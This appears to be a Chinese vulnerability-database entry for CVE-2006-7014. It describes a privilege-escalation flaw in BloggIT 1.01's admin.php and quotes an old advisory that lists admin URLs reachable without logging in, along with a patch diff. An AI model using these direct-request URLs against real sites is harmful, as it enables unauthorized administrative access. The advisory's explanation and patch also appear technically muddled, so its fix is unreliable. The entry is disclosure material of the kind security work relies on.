BloggIT 'admin.php'权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191700 漏洞类型 未知
发布时间 2007-02-14 更新时间 2007-02-14
CVE编号 CVE-2006-7014 CNNVD-ID CNNVD-200702-274
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/87038
https://cxsecurity.com/issue/WLB-2007020058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-274
|漏洞详情
BloggIT1.01版本及其早期版本的admin.php没有适当地建立一个用户会话,这会允许远程攻击者可以借助一个直接的请求,获得权限。
|漏洞EXP
*/ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]>
*/ BloggIT <= 1.01 (admin.php) Arbitrary code execution
*/ 04/06/2006 5:48

Bug:

The BloggIT have on the admin.php:

require("session.inc.php");
//- session_start();
//- if ($_SESSION['login'] != "ok") header("Location: index.php");

and require() function don't include the file
for test the security session.

Proof of concept:

The cracker have arbitrary access at:

http://example/admin.php
http://example/admin.php?op=add_ent
http://example/admin.php?op=add_usr
http://example/admin.php?op=man_ent
http://example/admin.php?op=man_usr
http://example/admin.php?op=man_cat
http://example/admin.php?op=man_com
http://example/admin.php?op=man_fil

Patch:

--- admin.php   2006-06-05 20:51:05.000000000 +0200
+++ admin.php  2006-06-05 20:51:23.000000000 +0200
@@ -6,7 +6,7 @@
 require("config.inc.php");
 require("language.inc.php");
 require("parsing.inc.php");
-require("session.inc.php");
+include("session.inc.php");

print("<title>{$title} - Powered by BloggIT 1.01</title>\n");
 ?>
|受影响的产品
Bloggit Bloggit 1.01
|参考资料

来源:XF
名称:bloggit-admin-code-execution(27011)
链接:http://xforce.iss.net/xforce/xfdb/27011
来源:SECTRACK
名称:1016246
链接:http://www.securitytracker.com/id?1016246
来源:BUGTRAQ
名称:20060606BloggIT<=1.01(admin.php)Arbitrarycodeexecution
链接:http://www.securityfocus.com/archive/1/archive/1/436259/30/4620/threaded
来源:VUPEN
名称:ADV-2006-2210
链接:http://www.frsirt.com/english/advisories/2006/2210
来源:SECUNIA
名称:20499
链接:http://secunia.com/advisories/20499
来源:SREASON
名称:2255
链接:http://securityreason.com/securityalert/2255